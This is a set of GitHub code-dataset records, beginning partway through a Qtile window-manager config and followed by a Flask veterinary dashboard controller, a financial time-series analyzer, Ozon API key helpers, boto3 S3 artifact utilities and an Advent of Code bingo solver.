lazy.spawn(\"/home/abhi/.config/rofi/powermenu/type-2/powermenu.sh\"),\n desc='Run Launcher'\n ),\n Key([mod1], \"f\",\n lazy.spawn(\"firefox\"),\n desc='Firefox'\n ),\n Key([mod1], \"d\",\n lazy.spawn(\"discord\"),\n desc='Discord'\n ),\n Key([mod1], \"t\",\n lazy.spawn(\"telegram-desktop\"),\n desc='Telegram'\n ),\n Key([mod1], \"c\",\n lazy.spawn(\"code\"),\n desc='VS Code'\n ),\n Key([mod1], \"n\",\n lazy.spawn(\"pcmanfm\"),\n desc='File Manager'\n ), \n Key([mod], \"Tab\",\n lazy.next_layout(),\n desc='Toggle through layouts'\n ),\n Key([mod1], \"q\",\n lazy.window.kill(),\n desc='Kill active window'\n ),\n Key([mod, \"shift\"], \"r\",\n lazy.restart(),\n desc='Restart Qtile'\n ),\n Key([mod, \"shift\"], \"q\",\n lazy.shutdown(),\n desc='Shutdown Qtile'\n ),\n\n ### Window controls \n Key([mod], \"j\",\n lazy.layout.down(),\n desc='Move focus down in current stack pane'\n ),\n Key([mod], \"k\",\n lazy.layout.up(),\n desc='Move focus up in current stack pane'\n ),\n Key([mod, \"shift\"], \"j\",\n lazy.layout.shuffle_down(),\n lazy.layout.section_down(),\n desc='Move windows down in current stack'\n ),\n Key([mod, \"shift\"], \"k\",\n lazy.layout.shuffle_up(),\n lazy.layout.section_up(),\n desc='Move windows up in current stack'\n ),\n Key([mod], \"h\",\n lazy.layout.shrink(),\n lazy.layout.decrease_nmaster(),\n desc='Shrink window (MonadTall), decrease number in master pane (Tile)'\n ),\n Key([mod], \"l\",\n lazy.layout.grow(),\n lazy.layout.increase_nmaster(),\n desc='Expand window (MonadTall), increase number in master pane (Tile)'\n ),\n Key([mod], \"n\",\n lazy.layout.normalize(),\n desc='normalize window size ratios'\n ),\n Key([mod], \"m\",\n lazy.layout.maximize(),\n desc='toggle window between minimum and maximum sizes'\n ),\n Key([mod, \"shift\"], \"f\",\n lazy.window.toggle_floating(),\n desc='toggle floating'\n ),\n Key([mod], \"f\",\n lazy.window.toggle_fullscreen(),\n desc='toggle fullscreen'\n ),\n\n ### Stack controls\n Key([mod, \"shift\"], \"Tab\",\n lazy.layout.rotate(),\n lazy.layout.flip(),\n desc='Switch which side main pane occupies (XmonadTall)'\n ),\n Key([mod], \"space\",\n lazy.layout.next(),\n desc='Switch window focus to other pane(s) of stack'\n ),\n Key([mod, \"shift\"], \"space\",\n lazy.layout.toggle_split(),\n desc ='Toggle between split and unsplit sides of stack'\n ),\n \n # Sound\n Key([], \"XF86AudioMute\", lazy.spawn(\"amixer -q set Master toggle\")),\n Key([], \"XF86AudioLowerVolume\", lazy.spawn(\"amixer -c 0 sset Master 1- unmute\")),\n Key([], \"XF86AudioRaiseVolume\", lazy.spawn(\"amixer -c 0 sset Master 1+ unmute\")),\n \n # ScreenShots\n Key([], \"Print\", lazy.spawn(\"scrot -q 100 -e 'mv $f /home/abhi/Pictures'\")),\n Key([\"control\"], \"Print\", lazy.spawn('xfce4-screenshooter')),\n Key([\"control\", \"shift\"], \"Print\", lazy.spawn(\"scrot -q 100 -s -e 'mv $f /home/abhi/Pictures'\"))\n]\n\n# Grouping I created -*-\n\n# groups = [Group(i) for i in \"123456789\"]\ngroups = [\n Group('1', label=\"\", matches = [Match(wm_class = \"firefox\")], layout='monadtall'),\n Group('2', label=\"\", matches = [Match(wm_class = \"Code\")], layout='max'),\n Group('3', label=\"\", layout='monadtall'),\n Group('4', label=\"\", matches = [Match(wm_class = \"pcmanfm\")], layout='monadtall'),\n Group('5', label=\"\", matches = [Match(wm_class = \"discord\"), Match(wm_class=\"TelegramDesktop\")], layout='monadtall'),\n Group('6', label=\"\", matches = [Match(wm_class = \"vysor\")], layout='monadtall'),\n Group('7', label=\"\", layout='monadtall'),\n 
Group('8', label=\"\", layout='monadtall'),\n Group('9', label=\"\", layout='monadtall'),\n Group('0', label=\"\", layout='monadtall')\n ]\n\nfor i in groups:\n keys.extend(\n [\n # mod1 + letter of group = switch to group\n Key(\n [mod],\n i.name,\n lazy.group[i.name].toscreen(),\n desc=\"Switch to group {}\".format(i.name),\n ),\n # mod1 + shift + letter of group = switch to & move focused window to group\n Key(\n [mod, \"shift\"],\n i.name,\n lazy.window.togroup(i.name, switch_group=True),\n desc=\"Switch to & move focused window to group {}\".format(i.name),\n ),\n # Or, use below if you prefer not to switch to that group.\n # # mod1 + shift + letter of group = move focused window to group\n # Key([mod, \"shift\"], i.name, lazy.window.togroup(i.name),\n # desc=\"move focused window to group {}\".format(i.name)),\n ]\n )\n\nlayout_theme = {\"border_width\": 0,\n \"margin\": 8,\n \"border_focus\": \"e1acff\",\n \"border_normal\": \"1D2330\"\n }\n\nlayouts = [\n #layout.MonadWide(**layout_theme),\n #layout.Bsp(**layout_theme),\n #layout.Stack(stacks=2, **layout_theme),\n #layout.Columns(**layout_theme),\n #layout.RatioTile(**layout_theme),\n #layout.Tile(shift_windows=True, **layout_theme),\n #layout.VerticalTile(**layout_theme),\n #layout.Matrix(**layout_theme),\n #layout.Zoomy(**layout_theme),\n layout.MonadTall(**layout_theme),\n layout.Max(**layout_theme),\n layout.Stack(num_stacks=2),\n layout.RatioTile(**layout_theme),\n layout.TreeTab(\n font = \"Ubuntu\",\n fontsize = 10,\n sections = [\"FIRST\", \"SECOND\", \"THIRD\", \"FOURTH\"],\n section_fontsize = 10,\n border_width = 2,\n bg_color = \"1c1f24\",\n active_bg = \"c678dd\",\n active_fg = \"000000\",\n inactive_bg = \"a9a1e1\",\n inactive_fg = \"1c1f24\",\n padding_left = 0,\n padding_x = 0,\n padding_y = 5,\n section_top = 10,\n section_bottom = 20,\n level_shift = 8,\n vspace = 3,\n panel_width = 200\n ),\n layout.Floating(**layout_theme)\n]\n\nwidget_defaults = dict(\n font=\"Ubuntu Bold\",\n fontsize=12,\n padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(\n top=bar.Bar(\n [\n widget.GroupBox(\n active=gruvbox['fg9'],\n inactive=gruvbox['dark-gray'],\n highlight_method='line',\n block_highlight_text_color=gruvbox['dark-red'],\n borderwidth=0,\n highlight_color=gruvbox['tbg'],\n # background=gruvbox['fg1'],\n fontsize = 16,\n margin_y = 1,\n margin_x = 3,\n padding_y = 0,\n padding_x = 7, \n ),\n \n widget.CurrentLayout(),\n widget.Prompt(),\n widget.WindowName(),\n widget.Chord(\n chords_colors={\n \"launch\": (\"#ff0000\", \"#ffffff\"),\n },\n name_transform=lambda name: name.upper(),\n ),\n widget.Notify(),\n widget.Net(\n format = ' {down} ↓↑ {up}',\n # background=gruvbox['fg1'],\n # foreground=gruvbox['dark-blue']\n ),\n \n widget.Clock(\n # background=gruvbox['fg0'],\n foreground=gruvbox['dark-magenta'],\n format='􏕌 %a, %b %d - %H:%M'\n ),\n # widget.QuickExit(),\n widget.Systray(\n # background=gruvbox['fg0'],\n icon_size = 20,\n ),\n ],\n background=gruvbox['fg0'], size=26, margin=[8, 8, 1, 8], \n ),\n ),\n]\n\n# Drag floating layouts.\nmouse = [\n Drag([mod], \"Button1\", lazy.window.set_position_floating(), start=lazy.window.get_position()),\n Drag([mod], \"Button3\", lazy.window.set_size_floating(), start=lazy.window.get_size()),\n Click([mod], \"Button2\", lazy.window.bring_to_front()),\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: list\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n 
float_rules=[\n        # Run the utility of `xprop` to see the wm class and name of an X client.\n        *layout.Floating.default_float_rules,\n        Match(wm_class=\"confirmreset\"),  # gitk\n        Match(wm_class=\"makebranch\"),  # gitk\n        Match(wm_class=\"maketag\"),  # gitk\n        Match(wm_class=\"ssh-askpass\"),  # ssh-askpass\n        Match(title=\"branchdialog\"),  # gitk\n        Match(title=\"pinentry\"),  # GPG key password entry\n    ]\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nreconfigure_screens = True\n\n# If things like steam games want to auto-minimize themselves when losing\n# focus, should we respect this or not?\nauto_minimize = True\n\n# When using the Wayland backend, this can be used to configure input devices.\nwl_input_rules = None\n\n# XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this\n# string besides java UI toolkits; you can see several discussions on the\n# mailing lists, GitHub issues, and other WM documentation that suggest setting\n# this string if your java app doesn't work correctly. We may as well just lie\n# and say that we're a working one by default.\n#\n# We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in\n# java that happens to be on java's whitelist.\nwmname = \"LG3D\"\n\n@hook.subscribe.startup_once\ndef autostart():\n    home = os.path.expanduser('~')\n    subprocess.Popen([home + '/.config/qtile/autostart.sh'])","repo_name":"gmkng01/My_Arch_work_envirement","sub_path":"Dot_files/.config/qtile/config2.py","file_name":"config2.py","file_ext":"py","file_size_in_byte":11447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"23013744285","text":"from flask import Flask, render_template, request, redirect\nfrom flask import Blueprint\nfrom models.active_case import Active_case\nfrom datetime import date\n\n\nimport repos.active_case_repo as active_case_repo\nimport repos.pet_repo as pet_repo\nimport repos.doctor_repo as doctor_repo\n\nactive_case_blueprint = Blueprint('active_cases', __name__)\n\n@active_case_blueprint.route('/dashboard')\ndef dashboard():\n    unfiltered_cases = active_case_repo.select_all()\n    doctors = doctor_repo.select_all()\n    active_cases = []\n    for case in unfiltered_cases:\n        if case.check_in == date.today():\n            active_cases.append(case)\n\n    return render_template('dashboard/index.html', active_cases=active_cases, doctors=doctors)\n\n@active_case_blueprint.route('/dashboard/new')\ndef new_case():\n    pets = pet_repo.select_all()\n    return render_template('/dashboard/new_case.html', pets=pets)\n\n@active_case_blueprint.route('/dashboard/new', methods=['POST'])\ndef add_case():\n    pet = pet_repo.select(request.form['pet_id'])\n    active_case = Active_case(request.form['description'], request.form['emergency'], request.form['check_in'], pet, request.form['severity'])\n    active_case_repo.save(active_case)\n    return redirect('/dashboard')\n\n@active_case_blueprint.route(\"/dashboard/assign/<id>\", methods=['POST'])\ndef assign_case(id):\n    doctor = doctor_repo.select(request.form['doctor_id'])\n    active_case = active_case_repo.select(id)\n    active_case.doctor = doctor\n    active_case_repo.update(active_case)\n    return redirect('/dashboard')\n\n@active_case_blueprint.route('/dashboard/<id>')\ndef doctor_dashboard(id):\n    doctor = doctor_repo.select(id)\n    active_cases = active_case_repo.select_all()\n    return render_template('/dashboard/doctor_dashboard.html', doctor=doctor, active_cases=active_cases)\n\n@active_case_blueprint.route('/dashboard/dashboard/complete/<id>', 
methods=['POST'])\ndef complete_case(id):\n    case = active_case_repo.select(id)\n    case.completed = True\n    active_case_repo.update(case)\n    return redirect(f'/dashboard/{case.doctor.id}')\n\n@active_case_blueprint.route('/dashboard/dashboard/pend/<id>', methods=['POST'])\ndef pend_case(id):\n    case = active_case_repo.select(id)\n    case.check_in = request.form['check_in']\n    url = case.doctor.id\n    case.doctor = None\n    active_case_repo.update(case)\n    return redirect(f'/dashboard/{url}')","repo_name":"Matt-Matthaiou/Vet_management_project","sub_path":"controllers/active_case_controller.py","file_name":"active_case_controller.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7787658174","text":"import pandas as pd\nimport numpy as np\nfrom fintechlab.TickerSchema import TickerSchema\nfrom fintechlab.DataAnalyzer import DataAnalyzer\nfrom fintechlab.DatabaseAdapter import DatabaseAdapter\n\n# Class used to format data so the analyzer class keeps its modular independence\nclass AnalyzerAdapter:\n\tdef __init__(self):\n\t\tself.analyzer = DataAnalyzer()\n\t\tself.db = DatabaseAdapter()\n\n\tdef get_all_mean_returns(self, series, days_view=10, short=False, leveredge=1):\n\t\ttype = \"Long\" if not short else \"Short\"\n\t\tlev = \"leveraged * \" + str(leveredge) if leveredge != 1 else \"\"\n\t\tticker_name, start_date, end_date = TickerSchema.get_meta_values(series)\n\t\tticker_name = \"Mean return of \" + type + \" investment in \" + ticker_name + \" over \" + str(days_view) + \" days \" + lev\n\t\tif self.db.dates_are_unavailable(ticker_name, start_date, end_date):\n\t\t\tresults = []\n\t\t\tfor i in range(0, len(series)-days_view, 1):\n\t\t\t\tview = series[\"Value\"].iloc[i:i+days_view].values\n\t\t\t\ti_result = self.analyzer.get_mean_return(view, short, leveredge)\n\t\t\t\tresults.append(i_result)\n\t\t\tresults = np.vstack(results)\n\t\t\tresult = TickerSchema.create(series[\"Date\"].iloc[:days_view*-1], ticker_name, results)\n\t\t\tself.db.insert(result)\n\t\t\treturn result\n\t\telse:\n\t\t\treturn self.db.select_derivitive(ticker_name, start_date, end_date)\n\n\tdef get_divergence_from_linear_regression(self, series):\n\t\tseries_r = self.linear_regress_time_series(series)\n\t\tdivergence = series[\"Value\"].values - series_r[\"Value\"].values\n\t\tticker_name = series[\"ticker_name\"] + \" divergence from linear regression\"\n\t\treturn TickerSchema.create(series[\"Date\"], ticker_name, divergence)\n\n\tdef adjust_by_linear_regression(self, series):\n\t\tseries_r = self.linear_regress_time_series(series)\n\t\tseries_r = self.normalize_to_latest(series_r)\n\t\tseries[\"Value\"] = series[\"Value\"] / series_r[\"Value\"]\n\t\treturn series\n\n\tdef normalize_to_latest(self, series):\n\t\tlatest = series[\"Value\"].iloc[-1]\n\t\tnormalized_series = self.analyzer.normalize_to_x(series[\"Value\"].values, latest)\n\t\tticker_name = series[\"ticker_name\"] + \" normalized to latest value\"\n\t\treturn TickerSchema.create(series[\"Date\"], ticker_name, normalized_series)\n\n\tdef get_series_relation(self, series_one, series_two):\n\t\tticker_name, start_date, end_date = TickerSchema.get_meta_values(series_one)\n\t\tticker_name = str(series_one[\"ticker_name\"].iloc[0] + \" / \" + series_two[\"ticker_name\"].iloc[0])\n\t\tif self.db.dates_are_unavailable(ticker_name, start_date, end_date):\n\t\t\tdate = series_one[\"Date\"]\n\t\t\tticker_name = series_one[\"ticker_name\"] + \" / \" + 
series_two[\"ticker_name\"]\n\t\t\tvalue = self.analyzer.get_series_relation(series_one[\"Value\"], series_two[\"Value\"])\n\t\t\tresult = TickerSchema.create(date, ticker_name, value)\n\t\t\tself.db.insert(result)\n\t\t\treturn result\n\t\telse:\n\t\t\treturn self.db.select_derivitive(ticker_name, start_date, end_date)\n\t\t\n\tdef linear_regress_time_series(self, series):\n\t\tvalue = np.vstack(series['Value'].values)\n\t\tdate = np.vstack(np.arange(0, len(series['Date'].values)))\n\t\tvalue_pred = self.analyzer.linear_regress_series(value, date)\n\t\treturn TickerSchema.create(series[\"Date\"], series[\"ticker_name\"], value_pred)\n\t\t\n\tdef linear_regress_series(self, series_x, series_y):\n\t\tx_values = np.vstack(series_x['Value'].values)\n\t\ty_values = np.vstack(series_y['Value'].values)\n\t\tvalue_pred = self.analyzer.linear_regress_series(x_values, y_values)\n\t\tticker_name = series_x[\"ticker_name\"].iloc[0] + \"'s linear relationship to \" + series_y[\"ticker_name\"].iloc[0]\n\t\treturn TickerSchema.create(series_x[\"Date\"], ticker_name, value_pred)\n\t\t\n\tdef percent_change_series(self, series, days_increment=5):\n\t\tpercent_change = self.analyzer.percent_change_series(series[\"Value\"].values, days_increment)\n\t\tseries = series[::days_increment]\n\t\treturn TickerSchema.create(series[\"Date\"][1:], series[\"ticker_name\"][1:], percent_change)\n\t\t\n\tdef change_series(self, series, days_increment=5):\n\t\tpercent_change = self.analyzer.change_series(series[\"Value\"].values, days_increment)\n\t\tseries = series[::days_increment]\n\t\treturn TickerSchema.create(series[\"Date\"][1:], series[\"ticker_name\"][1:], percent_change)\n\t\t\n\tdef kernal_density_estimation(self, x_series, y_series, nbins = 64):\n\t\tx_series = x_series[\"Value\"].values\n\t\ty_series = y_series[\"Value\"].values\n\t\treturn self.analyzer.kernal_density_estimation(x_series, y_series, nbins)\n\t\t\n\tdef get_distribution_slice_from_tensor(self, tensor, x_value):\n\t\tx, y , z = tensor\n\t\tx = x[:,0]\n\t\treturn self.analyzer.get_distribution_slice_from_tensor(x, y, z, x_value)\n\t\t\n\tdef get_maximum_vector(self, x_series, y_series):\n\t\treturn self.analyzer.get_maximum_vector(x_series, y_series)\n\t\t\n\tdef get_p_date_on_guassian(self, time_series, date=-1):\n\t\tvalue_today = time_series[\"Value\"].iloc[date]\n\t\tseries = time_series[\"Value\"].values\n\t\treturn self.analyzer.p_on_gaussian(series, value_today)\n\t\n\tdef get_pdf_of_date_on_guassian(self, time_series, date=-1):\n\t\tvalue_today = time_series[\"Value\"].iloc[date]\n\t\tseries = time_series[\"Value\"].values\n\t\treturn self.analyzer.pdf_on_gaussian(series, value_today)\n\t\t\n\tdef gaussian_probability_of_divergence_from_linear_regression(self, data, view, i):\n\t\ti_data = data.iloc[i-view:i]\n\t\ti_data = self.get_divergence_from_linear_regression(i_data)\n\t\ttoday = self.get_p_date_on_guassian(i_data)\n\t\tsign = 1 if (today[1] > 0) else -1\n\t\treturn today[0] * sign\n\t\t\t\n\tdef get_series_of_gaussian_probability_of_divergence_from_linear_regression(self, data, view):\n\t\tticker_name, start_date, end_date = TickerSchema.get_meta_values(data)\n\t\tticker_name = \"Probability of \" + ticker_name + \" divergence from \" + str(view) + \" day linear regression\"\n\t\tif self.db.dates_are_unavailable(ticker_name, start_date, end_date):\n\t\t\tresults = []\n\t\t\tfor i in range(view, len(data), 1):\n\t\t\t\tprobality = self.gaussian_probability_of_divergence_from_linear_regression(data, view, 
i)\n\t\t\t\tresults.append(probality)\n\t\t\tresults = np.vstack(results)\n\t\t\tresult = TickerSchema.create(data[\"Date\"].iloc[view:], ticker_name, results)\n\t\t\tself.db.insert(result)\n\t\t\treturn result\n\t\telse:\n\t\t\treturn self.db.select_derivitive(ticker_name, start_date, end_date)\n\n\tdef get_gaussian_distribution(self, time_series):\n\t\treturn self.analyzer.gaussian_distribution(time_series[\"Value\"].values)\n\t\t\n\tdef get_beta_distribution(self, time_series):\n\t\treturn self.analyzer.beta_distribution(time_series[\"Value\"].values)\n\t\t\n\tdef get_distributive_gaussian_projection(self, data, projection, forward_length):\n\t\tprojection_values = self.analyzer.distributive_gaussian_projection(data[\"Value\"].values, projection, forward_length)\n\t\tprojection_dates = pd.date_range(start=data[\"Date\"].iloc[-1], periods=forward_length+1)\n\t\tticker_name = data[\"ticker_name\"] + \" \" + str(forward_length) + \" day projection\"\n\t\treturn TickerSchema.create(projection_dates, ticker_name, projection_values)\t\t\n\t\n\t\n\t\n\t","repo_name":"Thomas-Power/fintech-lab","sub_path":"fintechlab/AnalyzerAdapter.py","file_name":"AnalyzerAdapter.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24314940232","text":"all_metrics = ['hits_view_search', 'hits_view_pdp', 'hits_view', 'hits_tocart_search', 'hits_tocart_pdp',\n 'hits_tocart', 'session_view_search', 'session_view_pdp', 'session_view', 'conv_tocart_search',\n 'conv_tocart_pdp', 'conv_tocart', 'revenue', 'returns', 'cancellations', 'ordered_units',\n 'delivered_units', 'adv_view_pdp', 'adv_view_search_category', 'adv_view_all', 'adv_sum_all',\n 'position_category', 'postings', 'postings_premium']\ndef_metrics = [\"ordered_units\", \"cancellations\", \"returns\", \"revenue\", \"delivered_units\"]\nattribute_keys = [\"height\", \"depth\", \"width\", \"dimension_unit\", \"weight\", \"weight_unit\", 'pdf_list', 'attributes']\nlists_to_write1 = ['products', 'prices', 'stocks', 'categories', 'attributes', 'analytics', 'transactions', 'ratings']\nkeys_1 = ['prices', 'stocks', 'ratings', 'categories', 'attributes', 'attribute_values']\nkeys_3 = ['analytics', 'transactions']\nall_keys = ['product_ids', 'prices', 'stocks', 'ratings', 'categories', 'attributes', 'attribute_values', 'analytics',\n 'transactions']\ncompany_data_keys = [\"ozon_client_id\", \"api_key\", \"user_id\", \"id\"]\n\n\ndef check_scenario(scenario):\n for key in all_keys:\n need = scenario.get(key)\n if key in keys_1:\n scenario[key] = False if not isinstance(need, bool) else scenario[key]\n elif key == 'product_ids':\n scenario[key] = scenario[key] if isinstance(need, list) else []\n elif key in keys_3:\n if isinstance(need, dict):\n pass\n elif isinstance(need, bool) and need:\n if key == 'analytics':\n scenario[key] = {'metrics': [], 'period': 1, 'period_step_back': 1}\n else:\n scenario[key] = {'period': 1, 'period_step_back': 1}\n else:\n scenario[key] = {}\n scenario['attribute_values'] = scenario['product_ids'] if scenario['attribute_values'] else False\n return scenario\n\n\n# a = {'product_ids': [1212],\n# 'prices': True,\n# 'stocks': True,\n# 'analytics': {},\n# 'transactions': {'period': 1, 'period_step_back': 1},\n# 'ratings': True,\n# 'categories': True,\n# 'attributes': True,\n# 'attribute_values': []\n# }\n# from pprint import pprint\n#\n# pprint(check_scenario(a), sort_dicts=False)\n\ndef check_company_data(company_data, result=True):\n 
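\"\"\"Check that every key in company_data_keys is present and truthy, then\n    rename the id fields in place.\n\n    NOTE (editor): the pop() calls below run even when result is already\n    False, so a payload missing 'ozon_client_id' or 'id' raises KeyError\n    rather than returning False; callers should guard for that. Hypothetical\n    usage (values are illustrative only):\n        ok = check_company_data({'ozon_client_id': 1, 'api_key': 'k',\n                                 'user_id': 7, 'id': 42})\n    \"\"\"\n    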
for key in company_data_keys:\n if not company_data.get(key):\n result=False\n company_data['client_id'] = company_data.pop('ozon_client_id')\n company_data['company_id'] = company_data.pop('id')\n return result","repo_name":"Dmitri123321/ozon_api2","sub_path":"libb/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34191544163","text":"import os\nfrom pathlib import Path\nfrom typing import List, Tuple, Optional, Generator\n\nfrom boto3.s3 import transfer\nfrom botocore.client import BaseClient\nfrom tqdm import tqdm\n\n\ndef dest_file_path(key: str, output_path: Path) -> Path:\n return output_path / \"/\".join(key.split(\"/\")[4:])\n\n\ndef download_run_artifact_files(s3_client: BaseClient, bucket_name: str, repo_user_name: str, repo_name: str,\n run_name: str, output_dir: Optional[str]):\n artifact_prefix = f\"artifacts/{repo_user_name}/{repo_name}/{run_name},\"\n\n output_path = Path(output_dir or os.getcwd())\n\n total_size = 0\n keys = []\n paginator = s3_client.get_paginator('list_objects')\n page_iterator = paginator.paginate(Bucket=bucket_name, Prefix=artifact_prefix)\n for page in page_iterator:\n for obj in (page.get(\"Contents\") or []):\n key = obj[\"Key\"]\n\n total_size += obj[\"Size\"]\n if obj[\"Size\"] > 0 and not key.endswith(\"/\"):\n keys.append(key)\n\n downloader = transfer.S3Transfer(s3_client, transfer.TransferConfig(), transfer.OSUtils())\n\n # TODO: Make download files in parallel\n with tqdm(total=total_size, unit='B', unit_scale=True, unit_divisor=1024,\n desc=f\"Downloading artifacts\") as pbar:\n def callback(size):\n pbar.update(size)\n\n for i in range(len(keys)):\n key = keys[i]\n\n file_path = dest_file_path(key, output_path)\n file_path.parent.mkdir(parents=True, exist_ok=True)\n\n downloader.download_file(bucket_name, key, str(file_path), callback=callback)\n\n\ndef list_run_artifact_files(s3_client: BaseClient, bucket_name: str, repo_user_name: str, repo_name: str,\n run_name: str) -> Generator[Tuple[str, str, int], None, None]:\n artifact_prefix = f\"artifacts/{repo_user_name}/{repo_name}/{run_name},\"\n paginator = s3_client.get_paginator('list_objects')\n page_iterator = paginator.paginate(Bucket=bucket_name, Prefix=artifact_prefix)\n for page in page_iterator:\n for obj in (page.get(\"Contents\") or []):\n if obj[\"Size\"] > 0:\n yield obj[\"Key\"].split(\"/\")[4], \"/\".join(obj[\"Key\"].split(\"/\")[5:]), obj[\"Size\"]\n\n\ndef __remove_prefix(text, prefix):\n if text.startswith(prefix):\n return text[len(prefix):]\n return text\n\n\ndef upload_job_artifact_files(s3_client: BaseClient, bucket_name: str, repo_user_name: str, repo_name: str, job_id: str,\n artifact_name: str, local_path: Path):\n total_size = 0\n for root, sub_dirs, files in os.walk(local_path):\n for filename in files:\n file_path = os.path.join(root, filename)\n file_size = os.path.getsize(file_path)\n total_size += file_size\n\n uploader = transfer.S3Transfer(s3_client, transfer.TransferConfig(), transfer.OSUtils())\n\n with tqdm(total=total_size, unit='B', unit_scale=True, unit_divisor=1024,\n desc=f\"Uploading artifact '{artifact_name}'\") as pbar:\n def callback(size):\n pbar.update(size)\n\n prefix = f\"artifacts/{repo_user_name}/{repo_name}/{job_id}/{artifact_name}\"\n for root, sub_dirs, files in os.walk(local_path):\n for filename in files:\n file_path = Path(os.path.join(root, filename)).absolute()\n\n key = prefix + 
__remove_prefix(str(file_path), str(local_path.absolute()))\n uploader.upload_file(\n str(file_path),\n bucket_name,\n key,\n callback=callback,\n )\n\n\ndef list_run_artifact_files_and_folders(s3_client: BaseClient, bucket_name: str, repo_user_name: str, repo_name: str,\n job_id: str, path: str) -> List[Tuple[str, bool]]:\n prefix = f\"artifacts/{repo_user_name}/{repo_name}/{job_id}/\" + path + (\"\" if path.endswith(\"/\") else \"/\")\n response = s3_client.list_objects(Bucket=bucket_name, Prefix=prefix, Delimiter=\"/\")\n folders = []\n files = []\n if \"CommonPrefixes\" in response:\n for f in response[\"CommonPrefixes\"]:\n folder_name = f[\"Prefix\"][len(prefix):]\n if folder_name.endswith(\"/\"):\n folder_name = folder_name[:-1]\n folders.append(folder_name)\n if \"Contents\" in response:\n for f in response[\"Contents\"]:\n files.append(f[\"Key\"][len(prefix):])\n return [(folder, True) for folder in folders] + [(file, False) for file in files]\n","repo_name":"michelkok/dstack","sub_path":"cli/dstack/aws/artifacts.py","file_name":"artifacts.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"31660232717","text":"from typing import List\n\n\"\"\"\nCreator: Przemysław Szewczak\nDate: 06.12.2021\nSource: https://adventofcode.com/2021/day/4\n\"\"\"\n\n\nclass Board:\n def __init__(self, row_list: List[List[int]]):\n self.rows = []\n [self.rows.append(i) for i in row_list]\n self.columns = [[], [], [], [], []]\n for row in self.rows:\n for ind, val in enumerate(row):\n self.columns[ind].append(val)\n\n def __str__(self):\n return_string = f'{self.rows[0]}\\n' \\\n f'{self.rows[1]}\\n' \\\n f'{self.rows[2]}\\n' \\\n f'{self.rows[3]}\\n' \\\n f'{self.rows[4]}'\n return return_string\n\n def bingo_check(self, drawn_numbers: List[int]) -> bool:\n \"\"\"\n Checking if typed numbers for a Bingo.\n If yes returning True and printing sum of unmarked numbers times last drawn number\n If no returning False, and another board is checking.\n \"\"\"\n bingo_value = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n for i in drawn_numbers:\n if i in self.rows[0]:\n bingo_value[0] += 1\n\n if i in self.rows[1]:\n bingo_value[1] += 1\n\n if i in self.rows[2]:\n bingo_value[2] += 1\n\n if i in self.rows[3]:\n bingo_value[3] += 1\n\n if i in self.rows[4]:\n bingo_value[4] += 1\n\n if i in self.columns[0]:\n bingo_value[5] += 1\n\n if i in self.columns[1]:\n bingo_value[6] += 1\n\n if i in self.columns[2]:\n bingo_value[7] += 1\n\n if i in self.columns[3]:\n bingo_value[8] += 1\n\n if i in self.columns[4]:\n bingo_value[9] += 1\n for i in bingo_value:\n if i >= 5:\n self.finished = True\n print(f'Bingo: {self.sum_not_typed(drawn_numbers)}')\n return True\n else:\n continue\n\n def sum_not_typed(self, drawn_numbers: List[int]):\n \"\"\"Method summing and returning value if Bingo occurred\"\"\"\n sum_not = 0\n for row in self.rows:\n for val in row:\n if val not in drawn_numbers:\n sum_not += val\n return sum_not * drawn_numbers[-1]\n\n\nclass DrawnNumbers:\n \"\"\"Class for numbers that will return numbers which takes part in Bingo game\"\"\"\n\n def __init__(self):\n \"\"\"Saving all available numbers to one variable then, taking first 5 to drawn number variable\"\"\"\n with open('day_4_input_1.txt', 'r') as file:\n self.available_numbers = file.readline().strip().split(',')\n self.drawn_numbers = list(map(lambda x: int(x), self.available_numbers[:5]))\n self.available_numbers = self.available_numbers[5:]\n\n def __str__(self):\n 
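# (editor's note) human-readable snapshot of the game state: the numbers\n        # drawn so far versus the pool still waiting to be drawn.\n        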
return_string = f'Drawn numbers: {self.drawn_numbers}\\n' \\\n                        f'Available numbers: {self.available_numbers}'\n        return return_string\n\n    def get_drawn_numbers(self) -> List[int]:\n        return self.drawn_numbers\n\n    def draw_next(self) -> List:\n        self.drawn_numbers.append(int(self.available_numbers[0]))\n        self.available_numbers = self.available_numbers[1:]\n        return self.drawn_numbers\n\n\ndef create_boards() -> List[Board]:\n    board_list = []\n    with open('day_4_input_1.txt', 'r') as file:\n        \"\"\"Skipping first 2 lines - drawn numbers and gap line\"\"\"\n        [file.readline() for _ in range(2)]\n        board_rows = []\n        for line in file:\n\n            board_rows.append(line.strip().split(' '))\n            if len(board_rows) == 5:\n                \"\"\"Skipping gap line, removing '' from rows, creating Board object,\n                saving them and preparing list for another board\"\"\"\n                file.readline()\n                for i in board_rows:\n                    while '' in i:\n                        i.remove('')\n                rows_to_save = []\n                \"\"\" Changing type from str to integer type \"\"\"\n                [rows_to_save.append(list(map(lambda x: int(x), i))) for i in board_rows]\n                board_list.append(Board(rows_to_save))\n\n                board_rows = []\n                continue\n    return board_list\n\n\ndef main() -> None:\n    \"\"\"Create and handle drawn numbers and available boards.\"\"\"\n    numbers = DrawnNumbers()\n    drawn = numbers.get_drawn_numbers()\n    boards = create_boards()\n    break_while = False\n    while True:\n\n        for board in boards:\n            if board.bingo_check(drawn):\n                break_while = True\n                break\n            else:\n                continue\n        if break_while:\n            break\n        numbers.draw_next()\n        drawn = numbers.get_drawn_numbers()\n\n\nif __name__ == '__main__':\n    